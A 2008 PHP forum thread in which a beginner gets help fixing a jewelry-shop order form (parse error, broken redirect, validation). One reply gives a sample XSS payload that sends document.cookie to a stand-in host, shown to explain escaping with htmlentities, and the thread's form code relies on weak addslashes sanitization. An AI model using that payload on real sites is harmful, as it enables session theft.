TalkPHP

TalkPHP (http://www.talkphp.com/forums.php)
-   Absolute Beginners (http://www.talkphp.com/absolute-beginners/)
-   -   PHP fill in form help (http://www.talkphp.com/absolute-beginners/3454-php-fill-form-help.html)

sacred_tinker 10-08-2008 01:55 AM
PHP fill in form help
 
Hey!

so, i have a website thats all coded with html, except for the fill-in form (order form) thats coded with PHP.


i have three issues with my PHP code. :-/
1) i've uploaded my code onto my website but when i go there i get this message:
Parse error: parse error, unexpected $ in /home/content/l/e/o/leopoldine/html/order.php on line 1008
but the issue is that there are only 1007 lines in my whole code!

2) when you hit submit, i receive an email telling me what the person filled in. But once you hit submit, the thanks-for-your-order page doesn't show up.

3) i have PHP Editor 2.22 and when i open my code in it, this "window" thingy is highlighted in red and underlined:
<script language="JavaScript" type="text/JavaScript">
<window.location.href = "http://www.mywebsite.com/ordersent.php";>
</script>

could someone please help me?

Enfernikus 10-08-2008 02:08 AM
1) Paste your script
2)

PHP Code:
<script language="JavaScript" type="text/JavaScript">
<window.location.href "http://www.mywebsite.com/ordersent.php";>
</script> 
is more correctly written like so

PHP Code:
<script language="JavaScript" type="text/JavaScript">
window.location.href "http://www.mywebsite.com/ordersent.php";
</script> 

sacred_tinker 10-08-2008 02:38 AM
PHP Code:
<?php



include("emailtemplate.php");






if(isset($_POST['submit'])) { 



#=============================================

#    Check if the required fields were entered

#=============================================



if(!$_POST['txt_name']) { die('You must enter your name, the field is required <br> <a href="javascript:history.back(-1)">go back</a>'); }

else if(!$_POST['txt_address']) { die('You must enter your address, the field is required<br> <a href="javascript:history.back(-1)">go back</a>'); }









#=============================================

#    Protect against XSS and hackers

#=============================================



$name addslashes($_POST['txt_name']);

$email addslashes($_POST['txt_email']);



if(!eregi("^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,4})$"$email)) { die('you did not enter a valid email address, please check your spelling and try again<br><a href="javascript:history.back(-1)">go back</a>'); }





$txt_msg addslashes($_POST['txt_msg']);

$txt_address addslashes($_POST['txt_address']);



$chk_purchase $_POST['chk_purchase'];

$chk_fixpurchase $_POST['chk_fixrepair'];



$drop_mod1 $_POST['drop_mod1'];

$drop_mod2 $_POST['drop_mod2'];

$drop_mod3 $_POST['drop_mod3'];

$drop_mod4 $_POST['drop_mod4'];

$drop_mod5 $_POST['drop_mod5'];



$drop_payment $_POST['drop_payment'];

$drop_delivery $_POST['drop_delivery'];

$drop_choice $_POST['drop_choice'];



if($_POST['drop_payment'] == "d1") {



#============================

#    Paypal was selected

#    Assign the values

#============================



$paypal_name $_POST['paypal_name'];

$paypal_email $_POST['paypal_email'];



$paypal_msg "Paypal Account Information: <br> Name: $paypal_name <br> Email: $paypal_email<br>";

}





#======================================================

#    Send email

#======================================================

// To send HTML mail, the Content-type must be set
$headers  'MIME-Version: 1.0' "\r\n";
$headers .= 'Content-type: text/html; charset=iso-8859-1' "\r\n";

// Additional headers
$headers .= 'To: Tinkas <formreciever@live.com>' "\r\n";
$headers .= 'From: formreciever@live.com <formreciever@live.com>' "\r\n";

$subject "An order has been placed!";






$sentmail mail($to,$subject,$message,$headers);

?>



<html>



<head>

<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">

<title>Tinka's Trinkets - (www.leopoldine.com/TinkasTinkets)</title>

<STYLE TYPE="text/css">
<!--
BODY
   {
   font-family:arial;
   }
-->
</STYLE>
<style type="text/css">



#d1 { display:none; }



</style>

<script language="javascript">



            var oldD="";

            function show(o){

                if(oldD!="") oldD.style.display='none';

                if(o.selectedIndex>0){

                    var d=document.getElementById(o[o.selectedIndex].value);

                    d.style.display='block';

                    oldD=d;

                }

            }

        </script>



</head>



<body>

<form method="post" action="<?php echo $_SERVER['PHP_SELF']; ?>">



<basefont face="arial, veradana">



<table border="0" width="959" id="table1">

    <tr>

        <td width="958">

        <table border="0" width="100%" id="table7">

            <tr>

                <td>

        <img border="0" src="pics/tt/ttbanner.jpg" width="951" height="116"></td>

            </tr>

        </table>

        <table border="0" width="100%" id="table6">

            <tr>

                <td bgcolor="#29CAE1">

                <font size="2">

                &nbsp;<a href="index.htm" style="text-decoration:none"><font color="#000000">leopoldine-jpm.com</font></a>

                &gt; Tinka's Trinkets &gt; Place an Order</font></td>

            </tr>

        </table>

        <table border="0" width="957" id="table2">

            <tr>

                <td rowspan="3" width="159" align="center" bgcolor="#A6DD00">

                <p align="left"><br>

                <b><font face="Arial" size="2">&nbsp;&nbsp;

                </font><a href="index.htm">

                <font face="Arial" size="2" color="#000000">

                <span style="text-decoration: none">Main</span></font></a></b></p>

                <p align="left">

                        <b>

                        <font color="#008000" size="2" face="Arial">&nbsp;&nbsp; </font>

                        <a href="ttindex.htm" style="text-decoration:none">

                        <font size="2" face="Arial" color="#000000">Tinka's Trinkets Home</font></a></b></p>

                        <p align="left">

                        <b>

                        <font size="2" face="Arial">&nbsp;&nbsp; </font>

                        <a href="ttnaturale.htm" style="text-decoration:none">

                        <font color="#000000" size="2" face="Arial">Natural Elements</font></a></b></p>

                <p align="left">

                        <b>

                        <font size="2" face="Arial">&nbsp;&nbsp; </font>

                        <a href="ttmetale.htm" style="text-decoration:none">

                        <font color="#000000" size="2" face="Arial">Metal Elements</font></a></b></p>

                        <p align="left">

                        <b>

                        <font size="2" face="Arial">&nbsp;&nbsp; </font>

                        <a href="ttmisc.htm" style="text-decoration:none">

                        <font color="#000000" size="2" face="Arial">Miscellaneous</font></a></b></p>

                        <p align="left">

                        <b>

                        <font size="2" face="Arial">&nbsp;&nbsp; </font>

                        </b><a href="ttarchives.htm" style="text-decoration: none">

                        <b><font face="Arial" size="2" color="#000000">Design 

                        Archives</font></b></a></p>

                <p align="left">

                        <b>

                        <font size="2" face="Arial">&nbsp;&nbsp; </font>

                        <a href="ttcatalog.htm" style="text-decoration:none">

                        <font color="#000000" size="2" face="Arial">Catalog</font></a></b></p>

                        <p align="left">

                        <b>

                        <font size="2" face="Arial">&nbsp;&nbsp; </font>

                        <font color="#008000" size="2" face="Arial">Place an Order</font></a></b></p>

                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                  <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                  <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                <p align="left">&nbsp;</p>
                </td>

                <td width="788" align="center" height="100">

                  <p align="center"><b><font size="5">Place an Order</font></b></p>

                    <p align="center"><font size="2">If you're interested in 

                    purchasing earrings or getting some of you jewelry repaired 

                    please fill in the form below:</font></p>

                <hr width="500" style="background-color: #000000" color="#A6DD00">

                </td>

            </tr>

            <tr>

                <td width="788" align="center" height="204">

                <font size="2">

                <html>

</b></font><font size="4">Jewelry Order From</font></font>

<form action="http://www.leopoldine-jpm.com/cgi-bin/FormMail.php" method="post">

<table cellpadding="3" id="table8">

<tr>

    <td style="font-size; font-family; color">

    <font face="Arial" size="2"><b>Full Name:</b></font><font face="Arial"><br>

    <input type="text" name="txt_name" value="" size="28"><br>

&nbsp;</font></td>

</tr>

<tr>

    <td style="font-size; font-family; color">

    <font face="Arial" size="2"><b>Your Email:</b></font><font face="Arial"><br>

    <input type="text" name="txt_email" value="" size="28"><br>

&nbsp;</font></td>

</tr>

<tr>

    <td style="font-size; font-family; color">

    <font face="Arial" size="2"><b>I'd like to:</b><br>

    

    <select name="drop_choice">

    <option value="Purchase Jewelry">Purchse Jewelry</option>

    <option value="Fix or Repair Jewelry">Fix/Repair Jewelry</option>

    </select>



    

</td>

</tr>

<tr>

<td style="font-size; font-family; color">

<font size="2" face="Arial"><b>Select the models you wish to order:<br>

</b></font><i><font face="Arial" size="2" color="#666666">(If you do not wish to 

purchase any jewelry (or would like to purchase less than 5 pairs/sets), leave 

the boxes on the &quot;select&quot; option)</font></i><font face="Arial"><br>

<select name="drop_mod1">

<option value="None Selected" selected="selected">Select</option>

<optgroup label="--------------------" ></optgroup>

<optgroup label="Natural Elements" >

<option value="Walnut Hoops">Walnut Hoops</option>

<option value="Tiki Hoops">Tiki Hoops</option>

<option value="Tiki Beads">Tiki Beads</option>

<option value="Vine Spheres">Vine Spheres</option>

<option value="Cowrie">Cowrie</option>

</optgroup>

<optgroup label="Metal Elements" >

<option value="Spiralina">Spiralina</option>

<option value="Hypnôse">Hypnôse</option>

<option value="Silver Rhodium">Silver Rhodium</option>

<option value="Links">Links</option>

<option value="Aqua Metallica">Aqua Metalica</option>

<option value="Curlz">Curlz</option>

<option value="Aluminum Love">Aluminum Love</option>

<option value="Harlequin">Harlequin</option>

</optgroup>

<optgroup label="Miscellaneous" >

<option value="Pick Me">Pick Me</option>

<option value="Tabby">Tabby</option>

<option value="Bolts n Nuts">Bolts n Nuts</option>

<option value="Keyz">Keyz</option>

<option value="Huayruro Macho">Huayruro Macho</option>

<option value="Pearl Drops">Pearl Drops</option>

<option value="Shobah Silver">Shobah Silver</option>

<option value="Trio">Trio</option>

<option value="Applejack">Applejack</option>

<option value="Amber Water">Amber Water</option>

<option value="Fairy Wings">Fairy Wings</option>

<option value="Alba Nova">Alba Nova</option>

</optgroup>

</select>





<select name="drop_mod2">

<option value="None Selected" selected="selected">Select</option>

<optgroup label="--------------------" ></optgroup>

<optgroup label="Natural Elements" >

<option value="Walnut Hoops">Walnut Hoops</option>

<option value="Tiki Hoops">Tiki Hoops</option>

<option value="Tiki Beads">Tiki Beads</option>

<option value="Vine Spheres">Vine Spheres</option>

<option value="Cowrie">Cowrie</option>

</optgroup>

<optgroup label="Metal Elements" >

<option value="Spiralina">Spiralina</option>

<option value="Hypnôse">Hypnôse</option>

<option value="Silver Rhodium">Silver Rhodium</option>

<option value="Links">Links</option>

<option value="Aqua Metallica">Aqua Metalica</option>

<option value="Curlz">Curlz</option>

<option value="Aluminum Love">Aluminum Love</option>

<option value="Harlequin">Harlequin</option>

</optgroup>

<optgroup label="Miscellaneous" >

<option value="Pick Me">Pick Me</option>

<option value="Tabby">Tabby</option>

<option value="Bolts n Nuts">Bolts n Nuts</option>

<option value="Keyz">Keyz</option>

<option value="Huayruro Macho">Huayruro Macho</option>

<option value="Pearl Drops">Pearl Drops</option>

<option value="Shobah Silver">Shobah Silver</option>

<option value="Trio">Trio</option>

<option value="Applejack">Applejack</option>

<option value="Amber Water">Amber Water</option>

<option value="Fairy Wings">Fairy Wings</option>

<option value="Alba Nova">Alba Nova</option>

</select><font size="2">&nbsp;&nbsp;&nbsp; </font>

<select name="drop_mod3">

<option value="None Selected" selected="selected">Select</option>

<optgroup label="--------------------" ></optgroup>

<optgroup label="Natural Elements" >

<option value="Walnut Hoops">Walnut Hoops</option>

<option value="Tiki Hoops">Tiki Hoops</option>

<option value="Tiki Beads">Tiki Beads</option>

<option value="Vine Spheres">Vine Spheres</option>

<option value="Cowrie">Cowrie</option>

</optgroup>

<optgroup label="Metal Elements" >

<option value="Spiralina">Spiralina</option>

<option value="Hypnôse">Hypnôse</option>

<option value="Silver Rhodium">Silver Rhodium</option>

<option value="Links">Links</option>

<option value="Aqua Metallica">Aqua Metalica</option>

<option value="Curlz">Curlz</option>

<option value="Aluminum Love">Aluminum Love</option>

<option value="Harlequin">Harlequin</option>

</optgroup>

<optgroup label="Miscellaneous" >

<option value="Pick Me">Pick Me</option>

<option value="Tabby">Tabby</option>

<option value="Bolts n Nuts">Bolts n Nuts</option>

<option value="Keyz">Keyz</option>

<option value="Huayruro Macho">Huayruro Macho</option>

<option value="Pearl Drops">Pearl Drops</option>

<option value="Shobah Silver">Shobah Silver</option>

<option value="Trio">Trio</option>

<option value="Applejack">Applejack</option>

<option value="Amber Water">Amber Water</option>

<option value="Fairy Wings">Fairy Wings</option>

<option value="Alba Nova">Alba Nova</option>

</select><font size="2">&nbsp;&nbsp;&nbsp; </font>

<select name="drop_mod4">

<option value="None Selected" selected="selected">Select</option>

<optgroup label="--------------------" ></optgroup>

<optgroup label="Natural Elements" >

<option value="Walnut Hoops">Walnut Hoops</option>

<option value="Tiki Hoops">Tiki Hoops</option>

<option value="Tiki Beads">Tiki Beads</option>

<option value="Vine Spheres">Vine Spheres</option>

<option value="Cowrie">Cowrie</option>

</optgroup>

<optgroup label="Metal Elements" >

<option value="Spiralina">Spiralina</option>

<option value="Hypnôse">Hypnôse</option>

<option value="Silver Rhodium">Silver Rhodium</option>

<option value="Links">Links</option>

<option value="Aqua Metallica">Aqua Metalica</option>

<option value="Curlz">Curlz</option>

<option value="Aluminum Love">Aluminum Love</option>

<option value="Harlequin">Harlequin</option>

</optgroup>

<optgroup label="Miscellaneous" >

<option value="Pick Me">Pick Me</option>

<option value="Tabby">Tabby</option>

<option value="Bolts n Nuts">Bolts n Nuts</option>

<option value="Keyz">Keyz</option>

<option value="Huayruro Macho">Huayruro Macho</option>

<option value="Pearl Drops">Pearl Drops</option>

<option value="Shobah Silver">Shobah Silver</option>

<option value="Trio">Trio</option>

<option value="Applejack">Applejack</option>

<option value="Amber Water">Amber Water</option>

<option value="Fairy Wings">Fairy Wings</option>

<option value="Alba Nova">Alba Nova</option>

</select><font size="2">&nbsp;&nbsp; </font>

<select name="drop_mod5">

<option value="None Selected" selected="selected">Select</option>

<optgroup label="--------------------" ></optgroup>

<optgroup label="Natural Elements" >

<option value="Walnut Hoops">Walnut Hoops</option>

<option value="Tiki Hoops">Tiki Hoops</option>

<option value="Tiki Beads">Tiki Beads</option>

<option value="Vine Spheres">Vine Spheres</option>

<option value="Cowrie">Cowrie</option>

</optgroup>

<optgroup label="Metal Elements" >

<option value="Spiralina">Spiralina</option>

<option value="Hypnôse">Hypnôse</option>

<option value="Silver Rhodium">Silver Rhodium</option>

<option value="Links">Links</option>

<option value="Aqua Metallica">Aqua Metalica</option>

<option value="Curlz">Curlz</option>

<option value="Aluminum Love">Aluminum Love</option>

<option value="Harlequin">Harlequin</option>

</optgroup>

<optgroup label="Miscellaneous" >

<option value="Pick Me">Pick Me</option>

<option value="Tabby">Tabby</option>

<option value="Bolts n Nuts">Bolts n Nuts</option>

<option value="Keyz">Keyz</option>

<option value="Huayruro Macho">Huayruro Macho</option>

<option value="Pearl Drops">Pearl Drops</option>

<option value="Shobah Silver">Shobah Silver</option>

<option value="Trio">Trio</option>

<option value="Applejack">Applejack</option>

<option value="Amber Water">Amber Water</option>

<option value="Fairy Wings">Fairy Wings</option>

<option value="Alba Nova">Alba Nova</option>

</select><br>

&nbsp;</font></td>

</tr>

<tr><td style="font-size; font-family; color"><font face="Arial"><b><font size="2">Message:<br>

    </font></b><font size="2"><i><font color="#666666">[In your message, please 

    specify the <u>quantity</u> of each model of earring you would like to order 

    (if you are ordering more than one pair) and specify any <u>modifications</u> 

    you would like to have made on the models you have selected (or to the 

    jewelry you would like to have fixed). If you are paying via Paypal, please 

    specify your Paypal email address).]</font></i><br></font>

    <textarea rows="10" cols="95" name="txt_msg">

Type your message here.

</textarea><br>

&nbsp;</font></td></tr>

<tr>

    <td height="47" style="font-size; font-family; color">

    

    <font face="Arial" size="2"><b>Method of Payment:</b></font>

    

      <select name="drop_payment" onChange="show(this)">

    <option value="Cash" rel="none">Cash</option>

    <option value="d1" >Paypal</option>

    </select>

    

    <br/>

    

    <div id="d1" style="font-family:verdana; font-size:10pt; color:#000066; border:1px solid ##A6ACB3; background-color:#FAFCF7; width:40%; padding:10px;">

   <p>You selected Paypal, please enter your name and email address that you entered into your paypal account.</p><br/>

    <table border="0" style="font-family:verdana; font-size:10pt; color:#000066; ">

    <tr>

    <td>Name:</td>

    <td><input type="text" name="paypal_name"></td>

    </tr>

    <tr>

    <td>Email:</td>

    <td><input type="text" name="paypal_email"></td>

    </tr>

    </table>

    </div>

    

    

    

&nbsp;</td></tr>

<tr><td style="font-size; font-family; color"><font face="Arial" size="2"><b>Delivery:</b></font><br>

    

    <select name="drop_delivery">

    <option value="Local">Local Pick-up (meet up)</option>

    <option value="Domestic">Domestic Postage (within Singapore)</option>

    <option value="International">International Postage</option>

    </select>

    <br>

    <font color="#666666" size="2" face="Arial"><i>(Handling is free of charge but 

    postage fees apply)</i></font>

</td>

</tr></td></tr>

<tr><td style="font-size; font-family; color">

    <font face="Arial" size="2"><b>Address: </b></font>

    <font face="Arial"><br>

    <textarea rows="10" cols="30" name="txt_address">

Type your address here.

</textarea><br>

&nbsp;</font></td></tr>

 <tr><td align="center" style="font-size; font-family; color">

<p align="left"><font face="Arial"><input type="submit" value="Submit" name="submit"><font size="2"> </font> <input type="reset" value="Clear"></font></p>

<script language="JavaScript" type="text/JavaScript">
<window.location.href = "http://www.leopoldine-jpm.com/ttordersent.php";>
</script>

    </td></tr>

</table>

</p>

</form>

                <p>&nbsp;</p>

</font>

                <hr width="500" style="background-color: #000000" color="#A6DD00">

                  <font size="2">

<p>In case the fill out form doesn't work, or you have any 

                questions, feel free to send me an 

                email:<br>

</font><a href="mailto:formreciever@live.com">

                <font face="Arial" color="#008000" size="3"><b>Click

        here to send me an e-mail!</b></font></a></p>

                <hr width="788" style="background-color: #000000" color="#29CAE1">

                </td></p>

            </tr>

            <tr>

                <td width="788" align="center"><font size="2"><font face="Arial" size="2"><!--[if gte mso 9]>

                <![endif]--><b>Contact</b></font><span style="language:EN;

mso-ansi-language:EN"><font face="Arial" size="2"><br>

                  <u>E-mail:</u> </font></span><span style="language:EN;

mso-ansi-language:EN"><font face="Arial" size="2">formreciever@live.com</font></span><span style="language:EN;

mso-ansi-language:EN"><font face="Arial" size="2"><br>

&nbsp;</font></span></font></td>

            </tr>

                    </table>

    <table border = "0" height="23">

  <tr>

    <td><hr width="950" style="background-color: #000000"></td>

  </tr>

</table>

<center><font color="#000000" face="Arial" size="1">[This site is best viewed with a 1024 x 768 screen resolution]<br>

© <em><small><small>Images, </small></small><small><small>content &amp; design</small></small><small><small>

copyright 2008 by Léopoldine Dubrulle 

(Tinka). &nbsp; All rights reserved</small></small></em></center>

    </font>

            </tr>

        </table>

</form>

</body>

</html>

ReSpawN 10-08-2008 10:05 AM
As it stands, I am not sure whether else if() is allowed. PHP usually copes well with just elseif. JavaScript on the other hands, uses else if instead of elseif. :) I think your first problem might be there.

As Enfernikus also told you, NEVER and I mean NEVER use unregular experessions in your script (javascript). < and > are operators, which are not to be used outside a compareson of sorts. This includes if, else, for, try, catch and so forth.

More to the point, I think your problem lies with the else if.

sketchMedia 10-08-2008 10:41 AM
the IF:
PHP Code:
if(isset($_POST['submit'])) { 
isn't properly closed.

A few things about your code.

Try to format it better, one line IF's can harm readability if they are large in length, and also statements need to be properly indented.
Try to control the amount of white space used to separate different sections and your comments, whilst informative are very bulky and cloud the code, reducing them to one liners and removing comments from obvious code will help.

This excellent post by VillageIdiot will give you more information about formatting code.
http://www.talkphp.com/tips-tricks/1...lean-code.html

Also using preg_match instead of eregi is faster:
PHP Code:
if(!preg_match("/^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,4})$/"$email)) { 
    die('you did not enter a valid email address, please check your spelling and try again<br><a href="javascript:history.back(-1)">go back</a>'); 
note i had to add the two expression delimeters '/' to the start and finish of the expression.

XSS/SQL INJECTION, the addslashes isn't going to be enough to protect against XSS, and also if the data is going to be inputted into a database it also wont protect against SQL injection.

Remember: FIEO (Filter Input Escape Output)

Using mysql_real_escape_string will protect you from SQL injection, whilst using something like htmlentities to convert the special html tags to their entity codes would be a start, it would make this malicious code fail:
html Code:
<script>
new Image().src='http://evilsite.org?cookies='+ encodeURI(document.cookie);
</script>

would be converted to:
html Code:
&lt;script&gt;
new Image().src='http://evilsite.org?cookies='+ encodeURI(document.cookie);
&lt;/script&gt;
And not executed by the browser.

Although its not fool proof by any means, its a start.

More info: Chris Shiflett: Foiling Cross-Site Attacks

But to answer you question fully, there is a missing '}'.

sacred_tinker 10-08-2008 11:32 AM
Eeeeep!
i'm sooo lost! someone made this code for me so i have no clue whats happening or what to do! >.<

sketchMedia 10-08-2008 12:28 PM
I think this is what the code should be like (minus the html):
PHP Code:
include 'emailtemplate.php';

if(isset($_POST['submit']))
{
    if(!$_POST['txt_name'])
    {
        die('You must enter your name, the field is required <br> <a href="javascript:history.back(-1)">go back</a>');
    }
    elseif(!$_POST['txt_address'])
    {
        die('You must enter your address, the field is required<br> <a href="javascript:history.back(-1)">go back</a>');
    }

    $name  addslashes($_POST['txt_name']);
    $email addslashes($_POST['txt_email']);

    if(!preg_match('/^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,4})$/'$email))
    {
        die('you did not enter a valid email address, please check your spelling and try again<br><a href="javascript:history.back(-1)">go back</a>');
    }

    $txt_msg         addslashes($_POST['txt_msg']);
    $txt_address     addslashes($_POST['txt_address']);
    $chk_purchase    $_POST['chk_purchase'];
    $chk_fixpurchase $_POST['chk_fixrepair'];

    $drop_mod1 $_POST['drop_mod1'];
    $drop_mod2 $_POST['drop_mod2'];
    $drop_mod3 $_POST['drop_mod3'];
    $drop_mod4 $_POST['drop_mod4'];
    $drop_mod5 $_POST['drop_mod5'];

    $drop_payment  $_POST['drop_payment'];
    $drop_delivery $_POST['drop_delivery'];
    $drop_choice   $_POST['drop_choice'];

    if($_POST['drop_payment'] == "d1")
    {
        $paypal_name  $_POST['paypal_name'];
        $paypal_email $_POST['paypal_email'];
        $paypal_msg   "Paypal Account Information: <br> Name: $paypal_name <br> Email: $paypal_email<br>";
    }
    // To send HTML mail, the Content-type must be set
    $headers  'MIME-Version: 1.0' "\r\n";
    $headers .= 'Content-type: text/html; charset=iso-8859-1' "\r\n";

    // Additional headers
    $headers .= 'To: Tinkas <formreciever@live.com>' "\r\n";
    $headers .= 'From: formreciever@live.com <formreciever@live.com>' "\r\n";

    $subject 'An order has been placed!';

    $sentmail mail($to$subject$message$headers);
That will now run, however the script doesnt seem to do anything apart from send an email saying 'an order was placed'

If you are going to use POST variables inside an email, you will have to be careful of mail injection, much like sql injection extra code can be injected into the script. This is usually a favourate exploit of spammers, who can use your form to spam. Usually the way to combat this is to check for any new lines and carrage returns from user input (\n\r).
PHP Code:
if(preg_match("/(\r|\n)$/i"$input)) { 
    die('Dont try and inject stuff into the email, it really is rather exasperating.'); 
Should work (im not the best at regex so there are probably ways around it).


All times are GMT. The time now is 12:07 AM.

Powered by vBulletin® Version 3.6.8
Copyright ©2000 - 2013, Jelsoft Enterprises Ltd.
Search Engine Optimization by vBSEO 3.1.0